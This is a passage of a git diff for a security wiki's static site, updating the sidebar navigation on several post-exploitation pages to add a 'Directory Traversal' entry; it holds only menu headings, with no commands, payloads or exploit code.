        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -228,22 +228,6 @@

Add - - diff --git a/docs/Post Exploitation/Active Directory (AD)/index.html b/docs/Post Exploitation/Active Directory (AD)/index.html index adf5cac8..843a72f0 100644 --- a/docs/Post Exploitation/Active Directory (AD)/index.html +++ b/docs/Post Exploitation/Active Directory (AD)/index.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -175,22 +175,6 @@

Activ - - diff --git a/docs/Post Exploitation/Enumeration/Linux/Hunting Down Sensitive Files.html b/docs/Post Exploitation/Enumeration/Linux/Hunting Down Sensitive Files.html index 831cc86c..851885d8 100644 --- a/docs/Post Exploitation/Enumeration/Linux/Hunting Down Sensitive Files.html +++ b/docs/Post Exploitation/Enumeration/Linux/Hunting Down Sensitive Files.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -187,22 +187,6 @@

Finding SSH - - diff --git a/docs/Post Exploitation/Enumeration/Linux/Network Enumeration.html b/docs/Post Exploitation/Enumeration/Linux/Network Enumeration.html index 8c82914f..3bd12bba 100644 --- a/docs/Post Exploitation/Enumeration/Linux/Network Enumeration.html +++ b/docs/Post Exploitation/Enumeration/Linux/Network Enumeration.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
